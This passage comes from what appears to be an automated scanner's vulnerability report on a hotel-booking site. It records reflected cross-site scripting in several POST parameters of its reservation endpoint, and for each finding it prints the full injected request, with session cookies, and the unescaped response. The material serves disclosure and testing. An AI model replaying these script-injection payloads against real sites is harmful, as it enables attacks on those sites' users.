The value of the propertyType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 949b0"><script>alert(1)</script>2ab353c7bc2 was submitted in the propertyType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
9%2C369.23&displayCurrencyCode=USD&promoType=&propertyID=15159&promoDescription=&immediateChargeRequired=true&depositRequired=true&guaranteeRequired=false&rateChange=true&taxRate=205.99&propertyType=H949b0"><script>alert(1)</script>2ab353c7bc2&supplierType=H&roomTypeDescription=Superior+Room+1+King+Bed&bedTypes=14%7CKing+Bed&bedType=14&rateDescription=Superior+Room+1+King+Bed&ValueAdds=&hrnQuoteKey=9f715d9d-c49b-4dea-841d-bf8e7f684953&room
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:35:51 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="propertyType" value="H949b0"><script>alert(1)</script>2ab353c7bc2">
...[SNIP]...

4.313. https://www.hotelplanner.com/Accept/Reserve.cfm [rateChange parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the rateChange request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 265cb"><script>alert(1)</script>edc7ebe0c7d was submitted in the rateChange parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
layNightlyRates=429.49%2C429.49%2C369.23&displayCurrencyCode=USD&promoType=&propertyID=15159&promoDescription=&immediateChargeRequired=true&depositRequired=true&guaranteeRequired=false&rateChange=true265cb"><script>alert(1)</script>edc7ebe0c7d&taxRate=205.99&propertyType=H&supplierType=H&roomTypeDescription=Superior+Room+1+King+Bed&bedTypes=14%7CKing+Bed&bedType=14&rateDescription=Superior+Room+1+King+Bed&ValueAdds=&hrnQuoteKey=9f715d9d-c4
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:35:44 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="rateChange" value="true265cb"><script>alert(1)</script>edc7ebe0c7d">
...[SNIP]...

4.314. https://www.hotelplanner.com/Accept/Reserve.cfm [rateCode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the rateCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fab0"><script>alert(1)</script>f908b250ca1 was submitted in the rateCode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
uperior+Room+1+King+Bed&bedTypes=14%7CKing+Bed&bedType=14&rateDescription=Superior+Room+1+King+Bed&ValueAdds=&hrnQuoteKey=9f715d9d-c49b-4dea-841d-bf8e7f684953&roomTypeCode=200034536&rateCode=2002057128fab0"><script>alert(1)</script>f908b250ca1&cancellationPolicy=We+understand+that+sometimes+plans+fall+through.+We+do+not+charge+a+change+or+cancel+fee.+However%2C+this+property+%28Millennium+Bostonian+Hotel+Boston%29+imposes+the+following+pen
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:36:27 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="rateCode" value="2002057128fab0"><script>alert(1)</script>f908b250ca1">
...[SNIP]...

4.315. https://www.hotelplanner.com/Accept/Reserve.cfm [rateDescription parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the rateDescription request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2ea1"><script>alert(1)</script>3d05f782135 was submitted in the rateDescription parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
anteeRequired=false&rateChange=true&taxRate=205.99&propertyType=H&supplierType=H&roomTypeDescription=Superior+Room+1+King+Bed&bedTypes=14%7CKing+Bed&bedType=14&rateDescription=Superior+Room+1+King+Bedb2ea1"><script>alert(1)</script>3d05f782135&ValueAdds=&hrnQuoteKey=9f715d9d-c49b-4dea-841d-bf8e7f684953&roomTypeCode=200034536&rateCode=200205712&cancellationPolicy=We+understand+that+sometimes+plans+fall+through.+We+do+not+charge+a+change+or+
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:36:12 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="rateDescription" value="Superior Room 1 King Bedb2ea1"><script>alert(1)</script>3d05f782135">
...[SNIP]...

4.316. https://www.hotelplanner.com/Accept/Reserve.cfm [rateFrequency parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the rateFrequency request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 804fd"><script>alert(1)</script>5d1bc77c587 was submitted in the rateFrequency parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequency=B804fd"><script>alert(1)</script>5d1bc77c587&nativeRoomRate=1434.2&nativeCurrencyCode=USD&extraPersonFees=&chargeableRoomRateTaxesAndFees=205.99&chargeableRoomRateTotal=1434.2&displayRoomRate=1434.2&NativeNightlyRates=429.49%2C429.49%2C369.23&D
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:34:04 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="rateFrequency" value="B804fd"><script>alert(1)</script>5d1bc77c587">
...[SNIP]...

4.317. https://www.hotelplanner.com/Accept/Reserve.cfm [roomTypeCode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the roomTypeCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfc91"><script>alert(1)</script>d327485d86c was submitted in the roomTypeCode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
omTypeDescription=Superior+Room+1+King+Bed&bedTypes=14%7CKing+Bed&bedType=14&rateDescription=Superior+Room+1+King+Bed&ValueAdds=&hrnQuoteKey=9f715d9d-c49b-4dea-841d-bf8e7f684953&roomTypeCode=200034536dfc91"><script>alert(1)</script>d327485d86c&rateCode=200205712&cancellationPolicy=We+understand+that+sometimes+plans+fall+through.+We+do+not+charge+a+change+or+cancel+fee.+However%2C+this+property+%28Millennium+Bostonian+Hotel+Boston%29+impose
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:36:23 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="roomTypeCode" value="200034536dfc91"><script>alert(1)</script>d327485d86c">
...[SNIP]...

4.318. https://www.hotelplanner.com/Accept/Reserve.cfm [roomTypeDescription parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the roomTypeDescription request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6054a"><script>alert(1)</script>9a5b6e7cfdb was submitted in the roomTypeDescription parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
59&promoDescription=&immediateChargeRequired=true&depositRequired=true&guaranteeRequired=false&rateChange=true&taxRate=205.99&propertyType=H&supplierType=H&roomTypeDescription=Superior+Room+1+King+Bed6054a"><script>alert(1)</script>9a5b6e7cfdb&bedTypes=14%7CKing+Bed&bedType=14&rateDescription=Superior+Room+1+King+Bed&ValueAdds=&hrnQuoteKey=9f715d9d-c49b-4dea-841d-bf8e7f684953&roomTypeCode=200034536&rateCode=200205712&cancellationPolicy=We+
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:35:59 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58910

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="roomTypeDescription" value="Superior Room 1 King Bed6054a"><script>alert(1)</script>9a5b6e7cfdb">
...[SNIP]...

4.319. https://www.hotelplanner.com/Accept/Reserve.cfm [roomTypeDescription parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the roomTypeDescription request parameter is copied into the HTML document as plain text between tags. The payload 59230<script>alert(1)</script>c81ab473367 was submitted in the roomTypeDescription parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
59&promoDescription=&immediateChargeRequired=true&depositRequired=true&guaranteeRequired=false&rateChange=true&taxRate=205.99&propertyType=H&supplierType=H&roomTypeDescription=Superior+Room+1+King+Bed59230<script>alert(1)</script>c81ab473367&bedTypes=14%7CKing+Bed&bedType=14&rateDescription=Superior+Room+1+King+Bed&ValueAdds=&hrnQuoteKey=9f715d9d-c49b-4dea-841d-bf8e7f684953&roomTypeCode=200034536&rateCode=200205712&cancellationPolicy=We+
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:36:00 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58906

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<td colspan="2" class="Default" align="top">
                           Superior Room 1 King Bed59230<script>alert(1)</script>c81ab473367<br>
...[SNIP]...

4.320. https://www.hotelplanner.com/Accept/Reserve.cfm [supplierType parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the supplierType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5b26"><script>alert(1)</script>f30d5227f91 was submitted in the supplierType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
